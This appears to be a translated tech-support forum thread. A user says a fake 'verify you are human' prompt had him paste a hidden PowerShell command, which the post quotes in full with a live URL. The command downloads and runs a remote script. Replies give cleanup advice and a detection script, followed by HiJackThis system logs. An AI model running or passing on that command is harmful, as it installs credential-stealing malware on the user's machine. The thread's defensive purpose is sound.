O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: Intel(R) Management Engine WMI Provider Registration (WMIRegistrationService) - Intel Corporation - C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
O23 - Service: Zakynthos Service (zksvc) - KRAFTON, Inc - C:\Program Files\Common Files\PUBG\zksvc.exe

--
End of file - 16099 bytes

I was going to download an MP3 audio file from a site, and
to verify whether I was a robot I was told to press the Windows+R combination and paste this command (powershell.exe -W Hidden -command $uri = 'https://dreter-bio.com/me/inst.txt'; $content = (Invoke-WebRequest -Uri $uri).Content; Invoke-Expression $content), and afterwards the computer started slowing down and so on; CPU usage sometimes reached 100, and when I researched it I saw people saying it was a virus; most likely it is a virus since they did something like this. Thank you in advance for your help...
 
Most likely it is a virus since they did something like this. Thank you in advance for your help...
Don't run code blocks you don't know just because you are told to; research them first, then apply them.
It contains malware; or rather, it most likely stole data related to your accounts. Change your account passwords (Instagram, Facebook, etc.) on a clean device.
Fix these:
Code:
O2 - BHO: Bing Bar Helper - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\Microsoft\BingBar\7.1.355.0\BingExt.dll
O3 - Toolbar: Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - "C:\Program Files (x86)\Microsoft\BingBar\7.1.355.0\BingExt.dll" (file missing)
O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file)
O4 - HKUS\S-1-5-18\..\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [Norton Download ManagerFORCE_UPGRADE_22_22_9] C:\PROGRA~3\Norton\{0C55C~1\NORTON~1.EXE /m /noui /instversion "22.22.9" (User 'Default user')
Check the system with MBAM; no active malware is visible, but check with it anyway.
Clear your browser history, cookies, etc.
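
The command quoted earlier in this thread has a recognisable shape: PowerShell started with a hidden window, a script fetched from a URL, and the result passed to Invoke-Expression. As an added example (not part of the original thread), the Python below flags that shape in a list of command lines, such as exported Run-dialog history or process-creation logs; the sample commands and the example.invalid hosts are constructed.

```python
import re
from dataclasses import dataclass, field
from typing import List

SHELL_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# Download primitives: cmdlets, their common aliases, WebClient methods.
DOWNLOAD_RE = re.compile(
    r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
    r"start-bitstransfer|downloadstring|downloadfile|downloaddata)\b", re.I)
# Running a string as code.
EXECUTE_RE = re.compile(r"\b(?:invoke-expression|iex)\b", re.I)
# "-W Hidden", "-Win Hidden", "-WindowStyle Hidden": any prefix of the name.
WINDOW_FLAG_RE = re.compile(r"(?<![\w-])-(w\w*)\s+hidden\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)

# Constructed samples; the first mirrors the shape of the command in the thread.
SAMPLE_COMMANDS = [
    r"powershell.exe -W Hidden -command $uri = 'https://files.example.invalid/inst.txt'; $content = (Invoke-WebRequest -Uri $uri).Content; Invoke-Expression $content\1",
    r'powershell -nop -c "iex (iwr https://cdn.example.invalid/a.ps1)"',
    r'powershell -c "Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"',
    r"cmd /c ipconfig /all\1",
    r"notepad C:\Users\user\notes.txt",
]


@dataclass
class Finding:
    command: str
    hidden_window: bool
    downloads: bool
    executes: bool
    urls: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Fetch-then-execute is the core of the pattern.
        return self.downloads and self.executes

    @property
    def priority(self) -> str:
        # A hidden window raises priority but is not required for a hit.
        if not self.suspicious:
            return "none"
        return "high" if self.hidden_window else "medium"


def has_hidden_window(cmd: str) -> bool:
    """True if a flag that abbreviates -WindowStyle is followed by Hidden."""
    return any("windowstyle".startswith(m.group(1).lower())
               for m in WINDOW_FLAG_RE.finditer(cmd))


def analyze(command: str) -> Finding:
    cmd = command.strip()
    if cmd.endswith("\\1"):        # Run-dialog history values end in "\1"
        cmd = cmd[:-2]
    is_ps = bool(SHELL_RE.search(cmd))
    return Finding(
        command=cmd,
        hidden_window=is_ps and has_hidden_window(cmd),
        downloads=is_ps and bool(DOWNLOAD_RE.search(cmd)),
        executes=is_ps and bool(EXECUTE_RE.search(cmd)),
        urls=URL_RE.findall(cmd),
    )


def triage(commands: List[str]) -> List[Finding]:
    """Return only the commands that download and then execute content."""
    return [f for f in map(analyze, commands) if f.suspicious]


if __name__ == "__main__":
    for f in triage(SAMPLE_COMMANDS):
        print(f.priority, f.urls, f.command[:60])
```

Any URL a finding reports belongs on the blocklist and in proxy or DNS log searches for other hosts that contacted it.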
 

First of all, thank you very much. So did they steal my information just once, or will they keep stealing it whenever I do something? I mean, I deleted the cookies etc., changed my passwords, ran a Kaspersky virus scan and a Malwarebytes virus scan, and nothing came up. I fixed the entries you listed; I don't need to do anything else, right?
 
I get FPS drops while playing FPS games. Even though my graphics card and CPU are quite good, I haven't been able to solve this. I'm waiting for your help; thank you for your effort. Also, if there is something I need to fix, how do I do it? I'll be shutting down the computer after posting this here? Thanks.
Code:
Logfile of HiJackThis+ build 2025-01-16 Beta v.3.4.0.17

Platform:  x64 Windows 11 (Home), 10.0.26100.3194 (ReleaseId: 2009, 24H2), Service Pack: 0
Time:      19.02.2025 - 03:31 (UTC+03:00)
Language:  OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Memory:    27,63 GiB Free / 32. Loading RAM (13 %), CPU (2 %)
Disk C:    820,13 GiB Free / 953 (SSD, GPT)
Elevated:  Yes
Ran by:    Cihan    (group: Administrators; type: Microsoft) on CANAVAR, FirstRun: yes

Chrome:  132.0.6834.197
Internet Explorer: 11.0.26100.1882
Default: "C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal (Secure Boot: On) (Code Integrity: On)

Running processes:
Number | Path
   1  C:\Program Files (x86)\Feature Manager\Feature Manager Service.exe
   1  C:\Program Files (x86)\Feature Manager\Feature_Manager.exe
   1  C:\Program Files (x86)\Feature Manager\MSIAPService.exe
   1  C:\Program Files (x86)\Feature Manager\OmApSvcBroker.exe
   1  C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
   1  C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2506.4.0_x64__cv1g1gvanyjgm\WhatsApp.exe
   1  C:\Program Files\WindowsApps\AppUp.IntelGraphicsExperience_1.100.5688.0_x64__8j3eq9eme6ctt\IGCC.exe
   1  C:\Program Files\WindowsApps\Microsoft.YourPhone_1.25011.56.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MsMpEng.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\NisSrv.exe
   1  C:\Users\Cihan\Desktop\HiJackThis\HiJackThis.exe
   1  C:\Windows\explorer.exe
   1  C:\Windows\System32\AggregatorHost.exe
   1  C:\Windows\System32\audiodg.exe
   2  C:\Windows\System32\csrss.exe
   1  C:\Windows\System32\ctfmon.exe
   1  C:\Windows\System32\dasHost.exe
   2  C:\Windows\System32\dllhost.exe
   1  C:\Windows\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_2c7653f29a37d3f4\OneApp.IGCC.WinService.exe
   1  C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_helper.exe
   1  C:\Windows\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_uf.exe
   1  C:\Windows\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe
   2  C:\Windows\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\Display.NvContainer\NVDisplay.Container.exe
   1  C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_a9e9122da4b4db5b\RtkAudUService64.exe
   1  C:\Windows\System32\dwm.exe
   2  C:\Windows\System32\fontdrvhost.exe
   1  C:\Windows\System32\LsaIso.exe
   1  C:\Windows\System32\lsass.exe
   1  C:\Windows\System32\NgcIso.exe
   5  C:\Windows\System32\RuntimeBroker.exe
   1  C:\Windows\System32\SearchIndexer.exe
   1  C:\Windows\System32\SearchProtocolHost.exe
   1  C:\Windows\System32\services.exe
   1  C:\Windows\System32\ShellHost.exe
   1  C:\Windows\System32\sihost.exe
   1  C:\Windows\System32\smartscreen.exe
   1  C:\Windows\System32\smss.exe
   1  C:\Windows\System32\spoolsv.exe
  77  C:\Windows\System32\svchost.exe
   2  C:\Windows\System32\taskhostw.exe
   1  C:\Windows\System32\wbem\WMIADAP.exe
   1  C:\Windows\System32\wbem\WmiPrvSE.exe
   1  C:\Windows\System32\wininit.exe
   1  C:\Windows\System32\winlogon.exe
   1  C:\Windows\System32\wlanext.exe
   3  C:\Windows\System32\WUDFHost.exe
   1  C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
   1  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
   1  C:\Windows\SysWOW64\MSIService.exe

O4 - ActiveSetup: HKLM\..\{8A69D345-D564-463c-AFF1-A69D9E530F96}: [StubPath] = C:\Program Files\Google\Chrome\Application\132.0.6834.197\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level --channel=stable (sign: 'Google LLC')
O4 - HKCU\..\StartupApproved\Run: [MicrosoftEdgeAutoLaunch_2290CA5D22A0CF51FC792BE002BC6E36] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --win-session-start (2024/11/28) (sign: 'Microsoft')
O4 - HKCU\..\StartupApproved\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent (2024/11/28) (sign: 'Valve Corp.')
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\Cihan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote'a Gönder.lnk    ->    C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (file missing) /tsr (2025/02/04)
O4 - HKLM\..\StartupApproved\Run: [RtkAudUService] = C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_a9e9122da4b4db5b\RtkAudUService64.exe -background (2024/12/08) (sign: 'Realtek Semiconductor Corp.')
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] = C:\WINDOWS\system32\SecurityHealthSystray.exe (2024/12/08) (sign: 'Microsoft')
O4 - HKLM\..\StartupApproved\Run32: [Keyboard Lighting Manager] = C:\Program Files (x86)\Keyboard Lighting Manager\Keyboard Lighting Manager.exe -systemstartup (2024/11/28) (sign: 'Micro-Star International CO., LTD.')
O4 - HKU\S-1-5-19\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Local service') (sign: 'Microsoft')
O4 - HKU\S-1-5-20\..\Run: [OneDriveSetup] = C:\Windows\System32\OneDriveSetup.exe /thfirstsetup (User 'Network service') (sign: 'Microsoft')
O7 - KnownFolder: C:\Users\Cihan\Desktop\Downloads (folder missing)
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, {374DE290-123F-4565-9164-39C4925E467B} = C:\Users\Cihan\Desktop\Downloads
O7 - KnownFolder: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, {374DE290-123F-4565-9164-39C4925E467B} = %USERPROFILE%\Desktop\Downloads
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Se&nd to OneNote: (default) = C:\Program Files\Microsoft Office\root\Office16\ONBttnIE.dll (file missing)
O17 - DHCP DNS 1: 178.233.140.147
O17 - DHCP DNS 2: 46.196.235.228
O17 - DHCP DNS 3: 46.196.235.35
O22 - Tasks: (disabled) \Microsoft\Office\Office Apps Prewarm - C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe /prewarm (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Office\Office Apps Prewarm Recurring - C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe /prewarm (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical - {613FBA38-A3DF-4AB8-9674-5604984A299A},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical - {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Flighting\FeatureConfig\BootstrapUsageDataReporting - {D759C938-B375-41CB-A2A2-E6D866A767F4} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup - C:\WINDOWS\system32\MdmDiagnosticsTool.exe /clean (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Servicing\OOBEFodSetup - C:\WINDOWS\system32\OOBEFodSetup.exe (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\SharedPC\Account Cleanup - {7750564D-D61C-4557-8A9D-7DF56BDCFF96} - C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\ThemeAssetTask_SyncFODState - {3BC5DD7D-EA3B-428C-B9B6-0723DB6A1057} - C:\Windows\System32\Windows.UI.Immersive.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\WINDOWS\system32\sc.exe start InventorySvc (sign: '')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser Exp - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun express (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\SdbinstMergeDbTask - C:\WINDOWS\system32\sdbinst.exe -mm (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Sustainability\SustainabilityTelemetry - {6EE41D75-D091-4FB7-9AD5-018760DD25D4} - C:\WINDOWS\system32\EcoScoreTask.dll (sign: 'Microsoft')
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem132.0.6833.0{F60DA91C-C96E-4948-A6CF-2973F5BE7F26} - C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\updater.exe --wake --system (sign: 'Google LLC')
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem134.0.6985.0{1653A49C-BDC2-4859-A2B6-93F49F39DCAD} - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --wake --system (sign: 'Google LLC')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 - {84F0FAE1-C27B-4F6F-807B-28CF6F96287D},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 - {429BC048-379E-45E0-80E4-EB1977941B5C},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Diagnosis\UnexpectedCodepath - C:\WINDOWS\system32\UCConfigTask.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\ReconcileConfigs - {15F5ECE1-4550-4A92-8E26-984FD1DA54FA} - C:\WINDOWS\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\UsageDataReceiver - {D4C0420F-76BD-4F66-A91F-918A93ABEBEB} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteMouseSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteMouseSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemotePenSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemotePenSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteTouchpadSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies - {706B965A-8308-4CD4-9900-87C2D79C121B} - C:\Windows\System32\netprofm.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\PerformanceTrace\RequestTrace - {9EFEB182-2EE3-4AF9-AFFA-521410D110D1} - C:\WINDOWS\system32\PerformanceTraceHandler.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\ReFsDedupSvc\Initialization - {DCFF735B-64F7-45F3-B39C-6C66BBE2120F} - C:\WINDOWS\System32\ReFsDedupSvc.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Sustainability\PowerGridForecastTask - {251E5B1F-E370-4E12-B5BD-B7AD2A8EE810} - C:\WINDOWS\system32\PowerGridForecastTask.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\TPM\Tpm-PreAttestationHealthCheck - {5014B7C8-934E-4262-9816-887FA745A6C4},TpmPreAttestationHealthCheck - C:\WINDOWS\system32\TpmTasks.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UIEOrchestrator - C:\WINDOWS\system32\UIEOrchestrator.exe /SendHeartbeat (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\WINDOWS\system32\MusNotification.exe (file missing)
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UUS Failover Task - C:\WINDOWS\System32\MLEngineStub.exe HandleUusFailoverEvaluationSignalFromWnf (sign: 'Microsoft')
O22 - Tasks: Feature Manager - C:\Program Files (x86)\Feature Manager\Feature_Manager.exe (sign: 'Micro-Star International CO., LTD.')
O22 - Tasks: OmApSvcBroker - C:\Program Files (x86)\Feature Manager\OmApSvcBroker.exe (sign: 'Micro-Star International CO., LTD.')
O22 - Tasks: ZoomUpdateTaskUser-S-1-5-21-3642336869-4069828061-3843680770-1001 - C:\Users\Cihan\AppData\Roaming\Zoom\bin\Zoom.exe --action=UpdateSchedule (sign: 'Zoom Video Communications, Inc.')
O23 - Service R2: Intel(R) Graphics Command Center Service - (igccservice) - C:\WINDOWS\System32\DriverStore\FileRepository\igcc_dch.inf_amd64_2c7653f29a37d3f4\OneApp.IGCC.WinService.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Innovation Platform Framework Service - (ipfsvc) - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_uf.exe (sign: 'Intel Corporation')
O23 - Service R2: Intel(R) Management Engine WMI Provider Registration - (WMIRegistrationService) - C:\WINDOWS\System32\DriverStore\FileRepository\mewmiprov.inf_amd64_d51901c26227fb29\WMIRegistrationService.exe (sign: 'Intel Corporation')
O23 - Service R2: Micro Star SCM - C:\WINDOWS\SysWOW64\MSIService.exe (sign: 'Micro-Star International CO., LTD.')
O23 - Service R2: Microsoft Defender Çekirdek Hizmeti - (MDCoreSvc) - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpDefenderCoreService.exe (sign: 'Microsoft')
O23 - Service R2: MSI Foundation Service - C:\Program Files (x86)\Feature Manager\MSIAPService.exe (sign: 'Micro-Star International CO., LTD.')
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem /ert (sign: 'NVIDIA Corporation')
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\WINDOWS\System32\DriverStore\FileRepository\realtekservice.inf_amd64_a9e9122da4b4db5b\RtkAudUService64.exe (sign: 'Realtek Semiconductor Corp.')
O23 - Service S2: Google Güncelleyici Dahili Hizmeti (GoogleUpdaterInternalService134.0.6985.0) - (GoogleUpdaterInternalService134.0.6985.0) - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --system --windows-service --service=update-internal (sign: 'Google LLC')
O23 - Service S2: Google Güncelleyici Hizmeti (GoogleUpdaterService134.0.6985.0) - (GoogleUpdaterService134.0.6985.0) - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --system --windows-service --service=update (sign: 'Google LLC')
O23 - Service S3: FACEITService - C:\Program Files\FACEIT AC\faceitservice.exe (sign: 'ESL FACEIT Group Ltd.')
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\132.0.6834.197\elevation_service.exe (sign: 'Google LLC')
O23 - Service S3: NVIDIA FrameView SDK service - (FvSvc) - C:\Program Files\NVIDIA Corporation\FrameViewSDK\nvfvsdksvc_x64.exe -service (sign: 'NVIDIA Corporation')
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService (sign: 'Valve Corp.')
O23 - Driver R1: FACEIT - C:\Program Files\FACEIT AC\FACEIT_AC.sys (sign: 'Microsoft' - no company)
O23 - Driver R3: ___ Windows 10 64 Bit için Intel(R) Wireless Bağdaştırıcı Sürücüsü  - (Netwtw14) - C:\WINDOWS\System32\DriverStore\FileRepository\netwtw6e.inf_amd64_477c028818b7a796\Netwtw14.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) GNA Scoring Accelerator service - (IntelGNA) - C:\WINDOWS\System32\DriverStore\FileRepository\gna.inf_amd64_04d4eecc5838a558\gna.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) HID Event Filter - (HidEventFilter) - C:\WINDOWS\System32\DriverStore\FileRepository\hideventfilter.inf_amd64_8b4344345b8897be\HidEventFilter.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Management Engine Interface  - (MEIx64) - C:\WINDOWS\System32\DriverStore\FileRepository\heci.inf_amd64_6b6e8cc42a3d1f09\x64\TeeDriverW10x64.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO GPIO Driver v2 - (iaLPSS2_GPIO2_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_gpio2_adl.inf_amd64_302e75596cffa74a\iaLPSS2_GPIO2_ADL.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Serial IO I2C Driver v2 - (iaLPSS2_I2C_ADL) - C:\WINDOWS\System32\DriverStore\FileRepository\ialpss2_i2c_adl.inf_amd64_e736c048ca307ed2\iaLPSS2_I2C_ADL.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel(R) Wireless Bluetooth(R) - (ibtusb) - C:\WINDOWS\System32\DriverStore\FileRepository\ibtusb.inf_amd64_4d48e97cd3587c52\ibtusb.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology BUS - (IntcAudioBus) - C:\WINDOWS\System32\DriverStore\FileRepository\intcaudiobus.inf_amd64_799c962c58e6bfeb\IntcAudioBus.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® Audio - (IntcBTAu) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtau.inf_amd64_164a440e6b400316\IntcBTAu.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Bluetooth® LE Audio - (IntcBtLE) - C:\WINDOWS\System32\DriverStore\FileRepository\intcbtle.inf_amd64_0c9aadaff32d0209\IntcBtLE.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for Digital Microphones - (IntcDMic) - C:\WINDOWS\System32\DriverStore\FileRepository\intcdmic.inf_amd64_acd402699ea3db34\IntcDMic.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology for USB Audio - (IntcUSB) - C:\WINDOWS\System32\DriverStore\FileRepository\intcusb.inf_amd64_c2a06a639869c7cd\IntcUSB.sys (sign: 'Intel Corporation')
O23 - Driver R3: Intel® Smart Sound Technology OED - (IntcOED) - C:\WINDOWS\System32\DriverStore\FileRepository\intcoed.inf_amd64_6f0a892deb241071\IntcOED.sys (sign: 'Intel Corporation')
O23 - Driver R3: ipf_acpi - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_acpi.inf_amd64_0bbfb278918dfdd5\ipf_acpi.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_cpu - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_cpu.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: ipf_lf - C:\WINDOWS\System32\DriverStore\FileRepository\ipf_cpu.inf_amd64_b25cc008923a9297\ipf_lf.sys (+safe mode) (sign: 'Intel Corporation')
O23 - Driver R3: nvlddmkm - C:\WINDOWS\System32\DriverStore\FileRepository\nvmii.inf_amd64_085de2d4b49d7707\nvlddmkm.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: NVPCF Service - (nvpcf) - C:\WINDOWS\System32\drivers\nvpcf.sys (sign: 'NVIDIA Corporation')
O23 - Driver R3: Realtek NetAdapter Driver - (rt68cx21) - C:\WINDOWS\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_81b332badcdcaabe\rt68cx21x64.sys (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Service for NVIDIA High Definition Audio Driver - (NVHDA) - C:\WINDOWS\system32\drivers\nvhda64v.sys (sign: 'NVIDIA Corporation')
